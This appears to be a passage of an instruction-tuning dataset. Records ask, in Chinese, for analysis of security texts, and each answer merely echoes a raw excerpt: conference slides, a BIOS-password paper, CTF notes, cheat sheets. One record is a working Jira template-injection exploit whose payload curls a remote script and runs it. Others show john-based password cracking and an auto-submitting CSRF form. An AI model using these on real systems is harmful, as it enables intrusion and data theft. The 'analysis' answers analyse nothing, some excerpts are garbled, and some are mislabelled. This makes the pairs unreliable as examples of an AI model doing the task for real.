screen in an Internet Banking application Does not mandate 2 factor authentication  says that single factor is insufficient (greater than one) Hardware tokens are expensive and easily lost or broken Biometrics for the end user are out of the question Control Types Mutual Authentication Device Fingerprinting Out of Band Authentication One Time Passwords Knowledge Base Archives Control Types Mutual Auth This is not device based Mutual Auth Site to user authentication Device Fingerprinting Persistent cookies Information from HTTP headers Device Interrogation Control Types Out of Band Auth Not true OOB Auth Only delivery is Out of Band. Authentication still happens within HTTP session Email delivery, SMS message to cell phone, Phone call that reads you a PIN Control Types One Time Passwords Dynamic single use password or PIN (generally delivered via OOB method) Static pre-issued One Time Pads Not to be confused with algorithmic token based auth (such as RSA SecurID) Control Types Knowledge Base Archives (KBAs) Questions based on inform", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: Feedly date: 2022-11-23 16:23:31.705686 background: bg-[#55a955] label: tags: - - categories: - Keyboard Shortcuts intro: | A visual cheat-sheet for the 25 keyboard shortcuts found on the Feedly app --- Keyboard Shortcuts ------------------ ### Navigation {.row-span-2} Shortcut | Action ---|--- `G` `T` | Show Today `G` `A` | Show All `G` `F` | Show Favorites `G` `G` | Jump to... `G` `L` | Read later `G` `I` | Index `G` `O` | Organize sources `Shift` `J` | Next source or collection `Shift` `K` | Previous source or collection `R` | Refresh {.shortcuts} ### Lists Shortcut | Action ---|--- `J` | Inline next artlcke `K` | Inline previous article `N` | Select the next article `P` | Select the previous article `Shift` `A` | Mark all as read {.shortcuts} ### Selected Article {.row-span-2} Shortcut | Action ---|--- `O` | Inline or close the currently selected article `V` | View the original in a new tab `M` | Toggle mark as read `X` | Mark as read and hide `S` | Read later `T` | Save to Board `B` | Save to Buffer `C` | Clip to Evernote `Shift` `V` | Preview {.shortcuts} ### Help Shortcut | Action ---|--- `?` | Show keyboard shortcuts {.shortcuts} Also see -------- - [Keyboard shortcuts for Feedly](https://blog.feedly.com/keyboard-shortcuts/) _(blog.feedly.com)_", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCatching the Golden Snitch Leveraging Threat Intelligence Platforms to Defend Against Cyber Attacks  ashley@teamt5.org  Malware analysis, malicious document detection, advanced persistence threat research  Tracking several cyber espionage groups for years  Tracking new operations, TTP of APT groups  zha0@teamt5.org  7+ years experience on Reverse Engineering  5+ years experience on malware analysis  Sandbox, Exploit research  APT research   Available Products in each phase  Available TIP Products   Some takeaways   What do we fear about cyber threat?  Why do we need Cyber Threat Intelligence?   Main features of TIP  Aggregation, Analysis, Action   Story Begins  Pitfalls of Correlation  New activities of Menupass group INTRODUCTION State Secrete (Political, Economic, Defense) National Security Business Intellectual Property Customer Data Personal identifiable Data Privacy  However Cyber Espionage Attacks Hacktivism Attacks Cyber Espionage Cyber Crime  Breaches happens everyday  Data leaked everyday.. Personal identifiable Data Privacy  New breaches happens everyday  New indicators disclosed everyday  New vulnerabilities disclosed everyday  About 18 new CVE vulnerabilities disclosed everyday in 2015  Totally 6419 CVE vulnerabilities disclosed in 2015  Advanced Persistent Threat  Targeting your Achilles' heel  Knowledge about adversaries and their motivations, intentions, and methods that is collected, analyzed, and disseminated in ways that help security and business staff at all levels protect the critical assets of the enterprise. Jon Friedman et al, 2015, Definitive Guide to Cyber Threat Intelligence Ref: iThome 關於一銀事件, 看完台灣新聞後, 目前我知道這 起盜領案是由一銀內鬼看色情郵件和用XP Ping 8.8.8.8 然後愛用Adidas和愛吃黑嘉麗軟糖的嫌 犯可以把錢拿走再去宜蘭買捷安特吃白鯧魚 被捕之後說要上廁所再去看醫生而且你們有沒 有發現, 安德魯居然有張明星臉!  Anunak: APT against financial institutions - Group-IB and Fox-IT  This report describes the details and type of operations carried out by an organized criminal group from Russia that focuses on financial industry.  How to ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEasyToUsePDDOS :BurnerPhoneDDOS2Dollarsaday:70CallsaMin WestonHeckerSecurityExpert SystemsNetwork Analyst/Penetrations Tester/PresidentOfComputer SecurityAssociationOf NorthDakota A1 Slide 1 A1 Author, 9/16/2013 WhoamIandwhatisthistalkabout?  AboutMe:PenetrationTester,ComputerScience/Geophysics,TonsofCerts,Customexploits writtenforPMSHotelSoftware,Twowayreservationfuzzing,andRFIDScannerthatmounts underchair.  About9yearsofpentesting,disasterrecovery,securityresearch  NERC,FFIEC,ISO,GLBAandFDIC,ComplianceauditsHIPPA,Omnibus  WrotecustomexploitsandscriptsforobscureInternetServiceProvidergear  ToolsofthetradeFleetofFakeiPhones  ThecreationofaPhoneCallBomberfromyourGramas prepaidphonetoasolarpowered hackertoolhiddeninlightfixtureatapubliclibrary  Screenshotdemonstrationof15phonestakingdowna200personcallcenter  DistributedDenialofservicePhoneSystemsWhatitishowitsusedHowitEffects Businesses  Alternateusesoncephonehasbeenflashedintoattackplatform. FleetofFakeiPhonesWithTeensy3.0 RFIDBadgeReader. WhatisDDOSandTDoS? Howdotheydiffer?  (DDoS)attack isanattempttomakeamachineor networkresourceunavailabletoitsintendedusers. Althoughthemeanstocarryout,motivesfor,and targetsofaDoS attackmayvary,itgenerallyconsists ofeffortstotemporarilyorindefinitelyinterruptor suspendservicesofahostconnectedtotheInternet.  TelephonyDenialofServiceorTDoS isafloodof unwanted,maliciousinboundcalls.Thecallsare usuallyintoacontactcenterorotherpartofan enterprise,whichdependsheavilyonvoiceservice.  DefinitionpulledfromWikipedia.com InstancesofTDOS  BankfraudCNPTheft  Banktransfermulescams  UnintentionalfromspoofedscammerCID  Callcenterattacks  Politicallymotivatedactivism CurrentMethodsofTDOS CallerIDSpoofReflectionAttack Malwareonphonesandcallmanagementsoftware Scripttoloadcallerinformationontorealtorwebpage HijackedPRIandSIPServicesWarDialing CallerIDreflectionattack Legitimatephoneservicewith spoofedCallerIDinformation Thousandsofcallsreturnedtothe numberthattheybelievecalledthem UsingsalesmentoTDOSf", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLike a Boss  Open source Java EE application server  Developed by JBoss, a division of Red Hat  Abstracts the infrastructure of Java-based web applications  Very large and complex  We have over the years had the understanding that JBoss AS will be primarily used by Java EE developers on their desktop to develop business applications. When they are ready to deploy those applications in production, they will have the practical sense to follow guidelines on securing jboss (which has been available in multiple forms in our wiki). There are no reasonable defaults in security to secure the shipped community version of JBoss AS. Anil Saldhana Lead JBoss Security Architect at JBoss, A Division of Red Hat http://anil-identity.blogspot.com/2010/04/security-community-jboss-as-versus.html Source: Wikipedia  Provides a web interface to MBeans  From the JBoss wiki:  Installed by default with no security  JBoss provides recommendations for securing the JMX Console  Some of which have been proven wrong  And some issues are simply not addressed  http://community.jboss.org/wiki/securethejmxconsole  Default login module in login-config.xml is:  org.jboss.security.auth.spi.UsersRolesLoginModule  This module does not provide  Enforced password complexity  Password lockouts  Etc.  Notice anything? <web-resource-collection> <web-resource-name>HtmlAdaptor </web-resource-name> <description>An example security config that only allows users with the role JBossAdmin to access the HTML JMX console web application </description> <url-pattern>/*</url-pattern> <http-method>GET</http-method> <http-method>POST</http-method> </web-resource-collection>  Persistent XSS  get admin JSESSIONID  CSRF  execute any functionality  Specify the module used for authentication per application  jboss.security:service=XMLLoginConfig  Load new login-config.xml from arbitrary URL  MBeans are exposed over RMI  Same functionality as JMX console  DIFFERENT authentication mechanism!  JBoss also recommends you secure this", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSmile for the Grenade! Camera go BANG! Vlad Gostomelsky Joshua A. Marpet Who are we?  Vlad Gostom @recompiler - Years of model rocketry and high power model rocketry  DARPA researcher  including future warrior combat system  Penetration Testing  Web Apps, networks, physical security (including banks)  Air Force Auxiliary  Ground Search and Rescue  CERT Team  Joshua Marpet @quadling  Joshua Marpet speaks all over, from Black Hat to Pumpcon.  His presentations range from Video Security to the progress of the Information Security Industry, and everywhere in between.  He's held every one of his childhood fantasy jobs except for astronaut, and currently teaches Infosec at Wilmington University, an NSA/DHS Center of Academic Excellence.  Josh gets the job done. 1950s Camera Timeline 1960s 1970s 1980s 1990s 2000s History Remote Video Surveillance UAV Surveillance UMV  Unmanned Marine Vehicle Inspection Cameras Fiber Optic Cameras Throwable Robots iRobot is Hackable!  Easily reprogrammable  Encouraged by manufacturer  Expansion modules sold by manufacturer and other distributors  Can be controlled by Wii controllers  iRobot frogger Camera Balls Ballistic Cameras Rafael Land systems _ Firefly Camera  http://www.ratchetup.com/eyes/2008/10/ballistic-camer.html  http://www.ohgizmo.com/2005/08/02/the-firefly-disposable-ballistic- camera/  8 seconds of video  600 meter range  Fin-Stabilized Spring out Wings for Range extension  From 40mm Grenade Launcher, which must be a Registered DD (Destructive Device) Approx $2k  Military Usage  Not available to most civilians  Deployment time is good, a few seconds  Uses standard equipment carried by military units. (40mm Grenade Launcher)  Ballistic Decommission  End of flight = Shatter! Ballistic Camera DIY  Easy access for Civilians  Price tag  DIY/MAKE spirit  Search and Rescue  Killer Airsoft  Just Because! Safety DIY Destructive Devices can go wrong. VERY WRONG! If you ever hear someone with a grenade launcher go, Hey, yall, someone ho", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNetwork Protocol Reverse Engineering Literature Survey for Eavesdropping on the Machines Presented 2016-08-05 at DEF CON 24 by Tim Estell and Katea Murray Prior DEF CON Talks DC22 - Jesus Molina presented Learn how to control every room at a luxury hotel remotely: the dangers of insecure home automation deployment. In-depth look at a specific protocol, but no repeatable process for NPRE. DC 22  Geoff McDonal presented Meddle: Framework for Piggy-back Fuzzing and Tool Development, arguing Why bother spending time understanding the protocol just to try break it?. His fuzzing tool sidesteps NPRE? DC 22  Dustin Hoffman and Thomas Kinsey presented What the Watchers See: Eavesdropping on Municipal Mesh Cameras for Giggles (or Pure Evil) where they decoded an undocumented protocol (i.e., NPRE). But they didnt focus on a repeatable process for you to reverse your own protocol. DC 23  Peter Shipely and Ryan Gooler presented Insteon' False Security And Deceptive Documentation where they asserted the published protocol documentation from Insteon is incorrect and deceptive. But no generalized process for NPRE. Summary of Research Published research for Network Protocol Reverse Engineering (NPRE) has addressed many challenges. The Protocol Informatics Project (PI Project) [Beddoe 2004] accomplished PRE using network traces and two string alignment algorithms, Needleman-Wunsch and Smith-Waterman. A Semi-automated approach [Gopalratnam 2006] uses packets from the protocol of interest and at least one packet with the fields labeled. Gaussian models are used to cluster the field and provide information to the user about field values. They note their algorithm does not scale well with the number of fields being analyzed or the size of the messages. Some researchers state that the limitation of network traces is a lack of protocol semantics as network traces only contain syntactic information and cannot provide the full protocol grammar [Caballero 2007]. These researchers rely on dyna", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 内存管理 > 注 : 笔记中拓扑图 drawio 源文件在其图片目录下 --- - 更多内存相关知识点可见 [内存笔记](../../../Develop/计算机基础/内存.md) Windows 内存管理可概括为三大机制: 虚拟地址空间管理; 物理页面管理; 地址转译和页面交换. ## 虚拟地址空间管理机制 在早期的计算机系统中, 程序员负责管理内存, 后来, 为了减轻程序员的负担, 改由操作系统负责管理内存. 这是程序设计发展史上的一次重要变革. 在多进程运行环境中, 为支持每个进程拥有逻辑上独立的地址空间, 操作系统需使各进程地址空间相互隔离, 互不干扰. Windows 虚拟地址空间管理目的是实现各进程地址空间隔离, 所以进程所见的是虚拟地址空间. 虚拟地址也称为线性地址, 是 Windows 在保护模式下所使用的逻辑地址, 其空间大小取决于地址总线的宽度, 比如, 在 32 位系统上, 虚拟地址空间大小为 232 字节, 然而 CPU 实际访问的却是物理地址空间. 所谓物理地址, 是 RAM 中存储单元的索引, CPU 通过这组地址线与 RAM 相连, 并通过在这些地址线加上电平信号来读写相应内存单元. 换言之, 在程序设计时使用虚拟地址, 而程序执行时则使用物理地址. 因此, Windows 需要对各进程虚拟地址进行管理, 以便各进程互不干扰地运行于相同的物理内存中. Windows 的进程虚拟地址空间是通过 VAD 来管理的. VAD 描述的是一段连续的地址空间范围, 被设计为一棵平衡二叉树, 以便 Windows 快速定位一段虚拟地址空间. 随着进程的运行, 不断地有地址范围被保留或提交, 该进程的 VAD 树便逐渐形成. 因此, 借助于 VAD 不仅能够获取进程所使用的虚拟地址空间信息, 还可以获取该进程的其他相关信息. --- ## 物理页面管理机制 由于 Windows 的进程都是在物理内存中执行的因此 Windows 需要管理物理地址所在的物理内存页面. Windows 系统使用 PFN(page frame number database, 页帧编号数据库) 来描述物理内存各页面的状态. PFN 数据库中的每个 PFN 项对应于一个物理页面, 记录了该页面的使用情况, 包括其状态对应页表项的地址等信息. 此外, Windows 还维护着一组链表, 分别将相同类型的页面链接起来, 主要包括零化链表空闲链表备用链表修改链表坏页面链表等. Windows 的虚拟地址转译和页面交换机制是基于这些数据结构实现的. --- ## 地址转译和页面交换机制 Windows 的的地址转译机制可将进程中所使用的虚拟地址转换为物理内存中的物理地址从而完成内存数据的定位为获取内存数据提取支持 ### 地址转译 由于程序使用虚拟地址, 而 CPU 则使用物理地址, 因此, 需借助于 CPU 芯片硬件和操作系统软件配合来实现从虚拟地址到物理地址的转换. 这就是 Windows 系统的虚拟地址转译机制. 转译机制是由 CPU 芯片硬件提供, 而转译中所使用的数据结构则由 Windows 操作系统管理. Windows 系统采用页式内存管理, 虚拟地址空间是按页 (page) 来管理的, 物理地址空间是按帧 (frame) 来管理的, 页和帧的大小相等. 因此, 进程的虚拟地址页面可实现离散分配, 即, 虚拟地址空间中连续的页面对应于物理地址空间的页帧无需连续. 采用页式内存管理后, 虚拟地址在结构上分为两部分: 页索引和页内偏移. 其中, 页索引是指该虚拟地址在地址映射时的索引编号, 页内偏移则指该地址在页面内部的具体位置. Intel x86 采用分级页表来管理地址映射. 32 位虚拟地址中的页索引部分又被分成页目录索引 (10 位) 和页表索引 (10 位) 两部分. 因此, Intel x86 在解析一个虚拟地址时, 首先根据最高 10 位在页目录中定位其页目录项 PDE(page directory entry), 它指向一个页表; 其次, 根据接下来的 10 位在页表中定位其页表项 PTE(page table entry), 此页表项指定了目标页面的物理地址; 最后, 在此物理地址基础上加上页内偏移量, 得到最终的物理地址. Windows 虚拟地址转译机制如下图所示. 如果 CPU 寄存器中的分页标志位被设置, 那么在执行内存操作机器指令时, CPU 会自动根据页目录和页表中的信息, 把虚拟地址转换成物理地址, 完成该指令操作. 因此, 借由 Windows 的地址转移机制, 可将进程中所使用的虚拟地址转换为物理内存中的物理地址, 从而完成内存数据的定位, 为内存数据获取提供支持. ### Windows页面交换", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n提供各种IT类书籍pdf下载如有需要请 QQ: 2011705918 注链接至淘宝不喜者勿入! 整理那么多资料也不容易请多多见谅非诚勿扰 [ G e n e r a l I n f o r ma t i o n ] 书名= 日志管理与分析权威指南 作者= 美褚瓦金美施密特美菲利普斯著 丛书名= 华章程序员书库 页数= 3 1 6 S S 号= 1 3 5 8 9 0 4 2 出版日期= 2 0 1 4 . 0 6 出版社= 北京机械工业出版社 I S B N 号= 9 7 8 - 7 - 1 1 1 - 4 6 9 1 8 - 6 中图法分类号= T P 3 9 3 . 0 7 原书定价= 6 9 . 0 0 参考文献格式= 美褚瓦金美施密特美菲利普斯著. 日志管理与分 析权威指南. 北京机械工业出版社, 2 0 1 4 . 0 6 . 内容提要= 本书从日志的基本概念开始循序渐进讲解整个日志生命期的详细过程 涵盖日志数据收集存储分析和法规依从性等主题并通过丰富的实例系统阐 释日志管理与日志数据分析的实用技术和工具", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBeyond the Scan: The Value Proposition of Vulnerability Assessment Damon J. Small, MSc.IA, CISSP Managing Consultant, IOActive August 6, 2015 About @damonsmall  Managing Consultant at IOActive  Louisiana native Not from Texas but I got here as fast as I could!  In IT since 1995; infosec since 2001  Spent much of my career supporting healthcare organizations in the Texas Medical Center  Studied music at LSU; grad school in 2005 for Information Assurance  Currently supporting a large oil & gas client in Houston Contact Email damon.small@ioactive.com chef@securitykitchen.website damon@damonsmall.me Blogs blog.securitykitchen.website ramble.damonsmall.me @damonsmall More than just clicking scan Red Team Blue Team #BlueCollarSecurity Scan Data Human Analysis Actionable Information Overview 1. Identifies potential vulnerabilities 2. Provides remediation information 3. Asset Management* 4. Software Management* 5. Compliance 6. Strategic  on-going operational intelligence 7. Tactical  Incident Response *Not generally a named feature, but a result of the activity. But first, a history lesson  Security Administrator Tool for Analyzing Networks (SATAN)  Released in 1995 and polarized the security industry PC Mag, April 23, 1996 The [DOJ] became concerned and threatened to press charges againstDan Farmer. Internet Scanner can check for more than 100 known vulnerabilities. Where are they now?  http://en.wikipedia.org/wiki/Dan_Farmer  http://en.wikipedia.org/wiki/Wietse_Venema  Richard Carson & Donna Ruginski forked Security Administrators Integrated Network Tool (SAINT) from SATAN in 1995  SAINT Became a commercial product in 1998 From those humble beginnings  An entire new capability was created for infosec  Progression from - Simple scanning - Vulnerability Assessment - Vulnerability Management Scanners have been around for two decades. but are still misunderstood. Electrons/Photons going though wire/fiber What is being examined What tool can be used 1. Physical 2. Datalink 3.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnch Presents: The Monkey In the Middle A pen-testers guide to playing in traffic. Twitter: @boneheadsanon A little about me Over 10 years experience in testing pens (Fountain is my favorite) Why we play in traffic?  Traffic is interesting stuff.!  Gives us insight in to how things work.!  Allows us to gather information on a target.!  Allows us to change things as they go by.!  Most importantly. !  It allows us to prank our friends. How to get into traffic  Always wear a helmet!  It can be dangerous.!  Really messes with networks.!  Your host might not be fast enough.!  Switches alert on some things.!  IDS usually will catch it. How to get into traffic  A tool discussion!  ARP Spoofing!  DNS Poisoning/Spoofing!  DHCP Snooping!  Transparent Proxies The most dangerous option ARP Spoofing/ Poisoning arpspoof - Provided as part of the dsniff suite of tools.! !  EASILY detected on a network.!  If done incorrectly can take down entire segments of the network.!  Need a fairly powerful host to keep up with the traffic. Another, slightly less dangerous way DNS Poisoning/ Spoofing Cain is able to perform this function amongst other tools.! !  May still require you to ARP Spoof first.!  Used in conjunction with other tools!  Provides your IP address the answer to DNS queries. Still a little less dangerous DHCP Spoofing The ever famous ettercap provides this function in an excellent way.! !  Still need to be able to sniff traffic going to from your target (throwing star works well for this if you have physical access.!  Switches can be configured to check for, deny, and alert on this attack.!  Used in conjunction with other tools. Actually doing something with traffic once you have it Proxies Multiple tools provide this service:!  Burp!  Mallory!  Squid Proxies Burp Suite Java, runs on almost anything, lots of options in the free version, paid has even more.! !  Just Works most of the time.!  Will hold http gets/posts based on configuration.!  Can change cookies, variables, html respons", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Level06 #### About The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06. #### Source code There is no source code available for this level #### Solutions ``` sed -n '37 p' /etc/passwd > /tmp/crack_pwd flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh john crack_pwd ----> password: hello john --show crack_pwd su flag06 <---- hello /bin/getflag ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# -*- coding: utf-8 -*- import requests req = requests.Session() def Base(url,subject): print(\"[+] Get Token\") r = req.get(\"%s/secure/ContactAdministrators!default.jspa\" % url) c = r.headers['Set-Cookie'] t = c[c.find(\"=\")+1:c.find(\";\")] data = { \"from\": \"test@test.com\", \"subject\": subject, \"details\": \"v\", \"atl_token\": t, \"发送\": \"发送\" } print(\"[+] Token : %s\" % t) print(\"[+] Exploit\") r = req.post(\"%s/secure/ContactAdministrators.jspa\" % url, data=data, allow_redirects=False) # print(r.status_code) def Exp(url, cmd=\"whoami\"): payload = \"\"\" #set ($cmd=\"%s\") #set ($e=\"exp\") #set ($a=$e.getClass().forName(\"java.lang.Runtime\").getMethod(\"getRuntime\",null).invoke(null,null).exec($cmd)) #set ($input=$e.getClass().forName(\"java.lang.Process\").getMethod(\"getInputStream\").invoke($a)) #set($sc = $e.getClass().forName(\"java.util.Scanner\")) #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName(\"java.io.InputStream\"))) #set($scan=$constructor.newInstance($input).useDelimiter(\"\\\\A\")) #if($scan.hasNext()) $scan.next() #end \"\"\" % cmd Base(url,payload) def Poc(url): payload = \"$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('whoami').toString()\" Base(url,payload) if __name__ == \"__main__\": Poc(\"http://localhost:8080\") Exp(\"http://localhost:8080\",\"curl vpsip/re.sh -o /tmp/re.sh\") Exp(\"http://localhost:8080\",\"sh /tmp/re.sh\")", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDefcon 11 Las Vegas, NV USA FILE: dc11-havenco.sxi / 24/01/03 / Page 1 ryan@metacolo.com HavenCo: what really happened HavenCo: what really happened Ryan Lackey <ryan@metacolo.com> 3 August 2003 Defcon 11, Las Vegas, CA USA latest version and supporting docs at: http://www.metacolo.com/papers/dc11-havenco/ Defcon 11 Las Vegas, NV USA FILE: dc11-havenco.sxi / 24/01/03 / Page 1 ryan@metacolo.com Background Background HavenCo was an offshore datahaven created by several idealists on the Principality of Sealand, a tiny artificial island fortess in th North Sea which claimed sovereignty due to location and history Sealand was a WW2 anti-aircraft platform abandoned by the British in international waters, subsequently occupied by pirate radio broadcasters and declared a sovereign nation  Status has been tested in minor court cases and affirmed, but no head-on challenge has ever been waged, and general policy of non-confrontation Defcon 11 Las Vegas, NV USA FILE: dc11-havenco.sxi / 24/01/03 / Page 1 ryan@metacolo.com Why this talk? Why this talk? While working at Sealand, it was difficult to see the greater context; minor issues seemed major Commercial concerns caused optimism (intentional and unintentional) Some issues have only recently been resolved; no one knew what would happen until recently Very little information has been made public; press has been carefully managed. Insiders have no incentive to reveal the truth Now that I no longer work on Sealand, I can provide substantial non-NDA information to the public Defcon 11 Las Vegas, NV USA FILE: dc11-havenco.sxi / 24/01/03 / Page 1 ryan@metacolo.com  On Confidentiality On Confidentiality Harm from discussing what happened is less than the risk to the public in continuing to operate without this knowledge Since the company is of uncertain operational status now, is there confidentiality for HavenCo Anything covered by NDA has been independently re- discovered using only information available to outsiders I have no curr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWIPING OUT CSRF JOE ROZNER | @JROZNER ITS 2017 WHAT IS CSRF? WHEN AN ATTACKER FORCES A VICTIM TO EXECUTE UNWANTED OR UNINTENTIONAL HTTP REQUESTS 4 WHERE DOES CSRF COME FROM?  Safe  GET  HEAD  OPTIONS  Unsafe  PUT  POST  DELETE 6 SAFE VS. UNSAFE COOKIES  Cookies typically used to specify session identifier for server  Users depend on user agents to correctly control access to cookies  User agents only but always send cookies with matching domain to hosts  This is done regardless of matching origin  Cookies are user agent global (work cross tab) 7 SESSION=298zf09hf012fh2; Domain=example.com; Secure; HttpOnly XSS  Attackers use XSS to inject CSRF payloads into the DOM  With sufficient XSS all counter measures can be bypassed 9 HOW DOES CSRF WORK? RESOURCE INCLUSION  Doesnt depend on XSS or attacker supplied pages  Requires an attacker to have control over resources on the page  Depends on using safe verbs unsafely  Limited to GET requests  Possible with any HTML tags for remote resources  img, audio, video, object, etc. 11 <img src=\"http://bank.lol/transfer.php?to=12345&amount=100000\"></img> FORM BASED  Normal HTML form that a victim is forced to submit  Either genuinely supplied or attacker supplied (via XSS)  Typically performed with JavaScript via XSS or attacker controlled page  Good option for bypassing same origin without CORS  Good option where safe verbs are used correctly  Useful for phishing links as long as form click is fast 13 <html> <head> </head> <body> <form action=\"http://bank.lol/transfer.php\" method=\"POST\"> <input type=\"hidden\" name=\"to\" value=\"attacker\" /> <input type=\"hidden\" name=\"amount\" value=\"100000\" /> <input type=\"submit\">Submit</input> </form> </body> <script>document.querySelector('form').submit();</script> </html> XHR  Typically comes from an XSS payload  Limited to the origin unless CORS is enabled  No page reload required  More difficult for victim to detect 15 <script> var xhr = new XMLHttpRequest(); xhr.open('POST', '/transfer.php', true)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypassing pre-b o ot authen tication passw ords b y instrumen ting the BIOS k eyb oard buer (practical lo w lev el attac ks against x86 pre-b o ot authen tication soft w are) Jonathan Brossard - jonathan@ivizindia.com Iviz T ec hnosolutions Pvt. Ltd. , K olk ata, India The wal ls b etwe en art and engine ering exist only in our minds. Theo Jansen Abstract. Pre-b o ot authen tication soft w are, in particular full hard disk encryption soft w are, pla y a k ey role in prev en ting information theft[1. In this pap er, w e presen t a new class of vulnerabilit y aecting m ultiple high v alue pre-b o ot authen tication soft w are, including the latest Microsoft disk encryption tec hnology : Microsoft Vista's Bitlo c k er, with TPM c hip enabled. Because Pre-b o ot authen tication soft w are programmers com- monly mak e wrong assumptions ab out the inner w orkings of the BIOS in terruptions resp onsible for handling k eyb oard input, they t ypically 1 use the BIOS API without ushing or in tializing the BIOS in ternal k ey- b oard buer. Therefore, an y user input including plain text passw ords remains in memory at a giv en ph ysical lo cation. In this article, w e rst presen t a detailed analysis of this new class of vulnerabilit y and generic exploits for Windo ws and Unix platforms under x86 arc hitectures. Un- lik e curren t academical researc h aiming at extracting information from the RAM[2[3, our practical metho dology do es not require an y ph ysical access to the computer to extract plain text passw ords from the ph ysical memory . In a second part, w e will presen t ho w this information leak age com bined with usage of the BIOS API without careful initialization of the BIOS k eyb oard buer can lead to computer reb o ot without console access and full securit y b ypass of the pre-b o ot authen tication pin if an attac k er has enough privileges to mo dify the b o otloader. Other related w ork include information leak age from CPU cac hes[4, reading ph ysical memor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: 列出云数据库 --- ## 列出云数据库 使用以下命令列出阿里云 RDS 云数据库服务 ```bash cf alibaba rds ls ``` 如果想指定特定属性可以使用以下参数 | 参数 | 用途 | | :------------------------: | :------------: | | `-r` 或者 `--region` | 指定区域 | | `-i` 或者 `--DBInstanceID` | 指定数据库 ID | | `-e` 或者 `--engine` | 指定数据库类型 | ::: warning 注意 * 为了提高程序运行速度当获取一次结果后获取的结果会缓存下来缓存目录为 `~/.config/cf/cache.db` * 如果不想使用缓存数据可以在执行命令的时候加上 `--flushCache` 参数 ::: 在列出数据库实例时加上 -a 命令会列出数据库实例的详细信息 ```bash cf alibaba rds ls -a ``` <Vssue /> <script> export default { mounted () { this.$page.lastUpdated = \"2023 年 7 月 1 日\" } } </script>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJava代码审计之基础开发 1 Java代码审计之基础开发 Author Catsay Type 审计 完成 感悟 啥都不会 时间 数据类型与运算符 Java和PHP不同他不是个弱类型的语 编写主法 main()法是类体中的主法该法从{开始到}结束PublicStatic和void分别是main()法的权限修饰符静态修饰符和 返回值修饰符Java程序中的main()法必须声明为public static void 其中String[] args是个字符串类型的数组它是 main()法的参数 创建项 我们这使的是IDEA先去创建个Java项然后创建个包 然后在包下去创建个类 Feb 10, 2021 Java代码审计之基础开发 2 然后会动成段代码我们写个main法进去打印个HelloWorld出来 package ; public class HelloWorld { public static void main(String[] args){//快捷键psvm System.out.println(\"Hello World\");//快捷键sout } } com.java.test Java代码审计之基础开发 3 数据类型 数据类型 String不是个数据类型是引数据类型属于Java提供的个类 声明变量  数据类型 变量名 = 值;  数据类型 变量名; 变量名 = 值; 关键字 Java代码审计之基础开发 4 关键字是Java语中已经被赋予特定意义的些单词不可以把这些字作为标识符来使约有50个左右 声明常量 final 数据类型 数据名称 = 值; 常量名通常使写字表常量只能被赋值次通常定义时即对其进初始化 这我们去新建个类去做测试 Java代码审计之基础开发 5 package ; public class JavaType { public static final int STATIC_NORMAL = 0; public static final int STATIC_LOCK = 1; public static void main(String[] args) { final int nCount; nCount = 123; System.out.println(\"STATIC_NORMAL value is :\"+STATIC_NORMAL); System.out.println(\"STATIC_LOCK value is :\"+STATIC_LOCK); System.out.println(\"nCount value is :\"+nCount); } } 强制类型转换 当把精度的变量的值赋值给低精度变量时必须使强制类型转换称为显式类型转换 语法规则(类型名)要转换的内容 package ; public class ChangeType { public static void main(String[] args) { int nNum = 10; double dNum = 10.8; int ndNum = (int)dNum; double dnNum = (double)nNum; System.out.println(\"ndNum = \"+ndNum); System.out.println(\"dnNum = \"+dnNum); com.java.test com.java.test Java代码审计之基础开发 6 } } 低精度转换精度会导致精度丢失 赋值运算符 赋值运算符以=表功能是将右操作数所含的值赋值给左的操作数 Java代码审计之基础开发 7 算数运算符 算数运算符在数学表达式中他们的作和在数学中的作样下表列出了所有的算数运算符 关系运算符 Java代码审计之基础开发 8 位运算符 Java定义了位运算符应于整数类型(int)整型(long)短整型(short)字符型(char)和字节型(byte)等类型 下表列出了位运算符的基本运算假设A60B13 逻辑运算符 下表列出了逻辑运算符的基本运算假设布尔类型变量A为真B为假 三元运算符 三元运算符的运算规律为若条件式的值为true则整个表达式取1否则取2 Java代码审计之基础开发 9 variable x = (expression)?value if true:value if false instanceof运算符 该运算符于操作对象实例检查该对象是否是个特定类型(类类型或者接类型) 